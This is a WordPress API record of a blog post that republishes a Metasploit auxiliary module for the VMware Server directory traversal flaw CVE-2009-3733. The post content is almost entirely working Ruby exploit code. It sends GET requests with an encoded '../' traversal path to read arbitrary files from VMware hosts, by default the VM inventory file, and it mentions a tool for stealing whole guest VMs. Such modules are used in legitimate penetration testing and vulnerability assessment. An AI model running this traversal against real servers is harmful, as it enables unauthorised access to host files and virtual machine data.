{"id":59317,"date":"2024-09-01T01:50:19","date_gmt":"2024-08-31T22:50:19","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180930\/vmware_server_dir_trav.rb.txt"},"modified":"2024-09-01T01:50:19","modified_gmt":"2024-08-31T22:50:19","slug":"vmware-server-directory-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/vmware-server-directory-traversal\/","title":{"rendered":"VMware Server Directory Traversal"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<\/p>\n<p># Exploit mixins should be called first<br \/>include Msf::Exploit::Remote::HttpClient<br \/># Scanner mixin should be near last<br \/>include Msf::Auxiliary::Scanner<br \/>include Msf::Auxiliary::Report<\/p>\n<p>def initialize<br \/>super(<br \/>&#8216;Name&#8217; =&gt; &#8216;VMware Server Directory Traversal Vulnerability&#8217;,<br \/>&#8216;Description&#8217; =&gt; &#8216;This modules exploits the VMware Server Directory Traversal<br \/>vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before<br \/>2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5<br \/>allows remote attackers to read arbitrary files. Common VMware server ports<br \/>80\/8222 and 443\/8333 SSL. If you want to download the entire VM, check out<br \/>the gueststealer tool.&#8217;,<br \/>&#8216;Author&#8217; =&gt; &#8216;CG&#8217; ,<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;References&#8217; =&gt;<br \/>[<br \/>[ &#8216;URL&#8217;, &#8216;https:\/\/www.vmware.com\/security\/advisories\/VMSA-2009-0015.html&#8217; ],<br \/>[ &#8216;OSVDB&#8217;, &#8216;59440&#8217; ],<br \/>[ &#8216;BID&#8217;, &#8216;36842&#8217; ],<br \/>[ &#8216;CVE&#8217;, &#8216;2009-3733&#8217; ],<br \/>[ &#8216;URL&#8217;, &#8216;http:\/\/fyrmassociates.com\/tools\/gueststealer-v1.1.pl&#8217; ]])<br \/>register_options(<br \/>[<br \/>Opt::RPORT(8222),<br \/>OptString.new(&#8216;FILE&#8217;, [ true, &#8220;The file to view&#8221;, &#8216;\/etc\/vmware\/hostd\/vmInventory.xml&#8217;]),<br \/>OptString.new(&#8216;TRAV&#8217;, [ true, &#8220;Traversal Depth&#8221;, &#8216;\/sdk\/%2E%2E\/%2E%2E\/%2E%2E\/%2E%2E\/%2E%2E\/%2E%2E&#8217;]),<br \/>])<br \/>end<\/p>\n<p>def run_host(target_host)<\/p>\n<p>begin<br \/>file = datastore[&#8216;FILE&#8217;]trav = datastore[&#8216;TRAV&#8217;]res = send_request_raw({<br \/>&#8216;uri&#8217; =&gt; trav+file,<br \/>&#8216;version&#8217; =&gt; &#8216;1.1&#8217;,<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;<br \/>}, 25)<\/p>\n<p>if res.nil?<br \/>print_error(&#8220;Connection timed out&#8221;)<br \/>return<br \/>end<\/p>\n<p>if res.code == 200<br \/>#print_status(&#8220;Output Of Requested File:\\n#{res.body}&#8221;)<br \/>print_good(&#8220;#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability&#8221;)<br \/>report_vuln(<br \/>{<br \/>:host =&gt; target_host,<br \/>:port =&gt; rport,<br \/>:proto =&gt; &#8216;tcp&#8217;,<br \/>:name =&gt; self.name,<br \/>:info =&gt; &#8220;Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}&#8221;,<br \/>:refs =&gt; self.references,<br \/>:exploited_at =&gt; Time.now.utc<br \/>}<br \/>)<br \/>else<br \/>vprint_status(&#8220;Received #{res.code} for #{trav}#{file}&#8221;)<br \/>end<\/p>\n<p>rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout =&gt; e<br \/>print_error(e.message)<br \/>rescue ::Timeout::Error, ::Errno::EPIPE<br \/>end<br \/>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliary # Exploit mixins should be called firstinclude Msf::Exploit::Remote::HttpClient# Scanner mixin should be near lastinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Report def initializesuper(&#8216;Name&#8217; =&gt; &#8216;VMware Server Directory Traversal Vulnerability&#8217;,&#8216;Description&#8217; =&gt; &#8216;This modules exploits the VMware Server Directory Traversalvulnerability in VMware Server 1.x before 1.0.10 build 203137 and &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59317","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59317","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59317"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59317\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}